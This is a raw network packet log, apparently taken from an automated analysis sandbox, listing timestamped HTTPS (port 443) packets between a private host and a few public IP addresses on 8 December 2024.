Dec 8, 2024 13:31:23.980739117 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.983741999 CET	443	49745	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.983760118 CET	443	49745	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.983798027 CET	49745	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.983803988 CET	443	49745	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.983835936 CET	49745	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.983865023 CET	49745	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.998867035 CET	443	49745	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.998884916 CET	443	49745	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.998948097 CET	49745	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.998954058 CET	443	49745	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.999018908 CET	49745	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.001318932 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.001334906 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.001431942 CET	49746	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.001440048 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.001480103 CET	49746	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.009097099 CET	443	49744	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.009119987 CET	443	49744	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.009213924 CET	49744	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.009222984 CET	443	49744	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.009275913 CET	49744	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.017595053 CET	443	49745	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.017616034 CET	443	49745	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.017697096 CET	49745	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.017703056 CET	443	49745	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.017748117 CET	49745	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.021217108 CET	443	49744	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.021233082 CET	443	49744	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.021312952 CET	49744	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.021320105 CET	443	49744	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.021418095 CET	49744	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.028965950 CET	443	49744	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.028981924 CET	443	49744	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.029052019 CET	49744	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.029059887 CET	443	49744	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.030065060 CET	49744	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.032789946 CET	443	49745	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.032807112 CET	443	49745	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.032854080 CET	49745	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.032860994 CET	443	49745	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.032892942 CET	49745	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.032912016 CET	49745	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.039006948 CET	443	49744	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.039022923 CET	443	49744	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.039113998 CET	49744	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.039122105 CET	443	49744	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.039216042 CET	49744	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.049071074 CET	443	49744	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.049093008 CET	443	49744	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.049165010 CET	49744	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.049171925 CET	443	49744	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.049273014 CET	49744	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.058581114 CET	443	49744	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.058597088 CET	443	49744	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.058640003 CET	49744	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.058646917 CET	443	49744	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.058674097 CET	49744	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.058693886 CET	49744	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.061842918 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.061858892 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.061902046 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.061920881 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.061942101 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.061973095 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.067085028 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.067101955 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.067181110 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.067194939 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.067249060 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.068556070 CET	443	49744	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.068578959 CET	443	49744	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.068613052 CET	49744	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.068619967 CET	443	49744	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.068654060 CET	49744	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.068670034 CET	49744	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.072957993 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.072973013 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.073018074 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.073026896 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.073088884 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.077811003 CET	443	49744	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.077828884 CET	443	49744	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.077879906 CET	49744	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.077888966 CET	443	49744	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.077923059 CET	49744	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.079442024 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.079458952 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.079526901 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.079535961 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.079587936 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.086457968 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.086472988 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.086549044 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.086558104 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.086600065 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.092057943 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.092077017 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.092122078 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.092132092 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.092164993 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.092178106 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.096529007 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.096546888 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.096857071 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.096865892 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.096944094 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.122961044 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.122980118 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.123020887 CET	49746	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.123030901 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.123068094 CET	49746	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.123085976 CET	49746	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.129004955 CET	443	49745	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.129028082 CET	443	49745	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.129101992 CET	49745	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.129115105 CET	443	49745	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.129147053 CET	49745	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.129158974 CET	49745	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.142849922 CET	443	49745	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.142868042 CET	443	49745	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.142935038 CET	49745	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.142941952 CET	443	49745	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.143110037 CET	49745	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.155757904 CET	443	49745	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.155775070 CET	443	49745	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.155848980 CET	49745	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.155860901 CET	443	49745	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.155898094 CET	49745	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.160840034 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.160865068 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.160943985 CET	49746	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.160950899 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.160990953 CET	49746	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.173875093 CET	443	49745	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.173892975 CET	443	49745	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.173935890 CET	49745	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.173943043 CET	443	49745	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.173970938 CET	49745	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.173990965 CET	49745	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.174989939 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.175007105 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.175055981 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.175071001 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.175101995 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.175108910 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.178652048 CET	443	49745	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.178669930 CET	443	49745	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.178706884 CET	49745	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.178711891 CET	443	49745	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.178761005 CET	49745	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.178761005 CET	49745	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.183346033 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.183362007 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.183389902 CET	49746	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.183439016 CET	49746	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.183443069 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.183490992 CET	49746	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.188764095 CET	443	49745	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.188786983 CET	443	49745	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.188858032 CET	49745	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.188864946 CET	443	49745	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.188909054 CET	49745	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.199435949 CET	443	49744	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.199459076 CET	443	49744	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.199520111 CET	49744	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.199527025 CET	443	49744	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.199570894 CET	49744	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.200468063 CET	443	49745	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.200484037 CET	443	49745	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.200525045 CET	49745	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.200531006 CET	443	49745	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.200567007 CET	49745	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.200592041 CET	49745	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.203557014 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.203572035 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.203655958 CET	49746	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.203661919 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.203694105 CET	49746	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.206512928 CET	443	49744	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.206528902 CET	443	49744	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.206613064 CET	49744	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.206620932 CET	443	49744	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.206655979 CET	49744	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.212372065 CET	443	49744	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.212408066 CET	443	49744	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.212462902 CET	49744	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.212472916 CET	443	49744	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.212503910 CET	49744	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.212526083 CET	49744	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.254112959 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.254131079 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.254203081 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.254216909 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.254267931 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.259363890 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.259382010 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.259434938 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.259443045 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.259499073 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.265248060 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.265266895 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.265341997 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.265352964 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.265393019 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.271085978 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.271102905 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.271178961 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.271188974 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.271225929 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.277038097 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.277053118 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.277136087 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.277148962 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.277194023 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.277215004 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.282802105 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.282819986 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.282886982 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.282896042 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.282941103 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.282959938 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.287880898 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.287898064 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.287970066 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.287980080 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.288014889 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.308278084 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.308316946 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.308386087 CET	49746	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.308402061 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.308423996 CET	49746	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.308444023 CET	49746	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.310992002 CET	443	49747	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:24.311053038 CET	443	49747	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:24.311134100 CET	49747	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:24.313628912 CET	443	49745	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.313653946 CET	443	49745	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.313708067 CET	49745	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.313714981 CET	443	49745	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.313752890 CET	49745	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.313771009 CET	49745	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.318618059 CET	443	49748	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:24.318665028 CET	443	49748	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:24.318702936 CET	49748	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:24.319217920 CET	443	49750	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:24.319276094 CET	443	49750	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:24.319835901 CET	49750	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:24.320828915 CET	443	49745	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.320846081 CET	443	49745	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.320920944 CET	49745	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.320926905 CET	443	49745	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.320954084 CET	49745	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.320969105 CET	49745	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.323951006 CET	443	49749	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:24.324012995 CET	443	49749	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:24.324078083 CET	49749	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:24.325855017 CET	443	49745	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.325908899 CET	443	49745	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.325964928 CET	49745	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.326014042 CET	49745	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.326805115 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.326824903 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.326889038 CET	49746	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.326894999 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.327083111 CET	49746	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.340908051 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.340929985 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.341022015 CET	49746	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.341027975 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.341192961 CET	49746	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.346050024 CET	49747	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:24.346071005 CET	443	49747	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:24.346487045 CET	49749	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:24.346487045 CET	49749	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:24.346504927 CET	443	49749	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:24.346513987 CET	443	49749	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:24.347841978 CET	49748	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:24.347860098 CET	443	49748	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:24.347872019 CET	49748	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:24.347878933 CET	443	49748	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:24.348170996 CET	49750	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:24.348170996 CET	49750	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:24.348177910 CET	443	49750	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:24.348185062 CET	443	49750	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:24.357027054 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.357045889 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.357117891 CET	49746	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.357125044 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.357214928 CET	49746	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.364540100 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.364587069 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.364685059 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.364700079 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.364737988 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.365372896 CET	443	49751	20.234.120.54	192.168.2.6
Dec 8, 2024 13:31:24.365454912 CET	49751	443	192.168.2.6	20.234.120.54
Dec 8, 2024 13:31:24.373569965 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.373590946 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.373636007 CET	49746	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.373642921 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.373681068 CET	49746	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.373698950 CET	49746	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.387926102 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.387943983 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.388046980 CET	49746	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.388046980 CET	49746	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.388053894 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.388099909 CET	49746	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.404074907 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.404094934 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.404150009 CET	49746	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.404156923 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.404222012 CET	49746	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.433118105 CET	49754	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:24.433152914 CET	443	49754	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:24.433211088 CET	49754	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:24.446003914 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.446032047 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.446127892 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.446140051 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.446165085 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.446186066 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.447678089 CET	49754	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:24.447690964 CET	443	49754	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:24.451916933 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.451941013 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.452009916 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.452018976 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.452078104 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.457551956 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.457586050 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.457645893 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.457653999 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.457720995 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.463176966 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.463195086 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.463289976 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:24.463299036 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:24.463346958 CET	49742	443	192.168.2.6	150.171.27.10
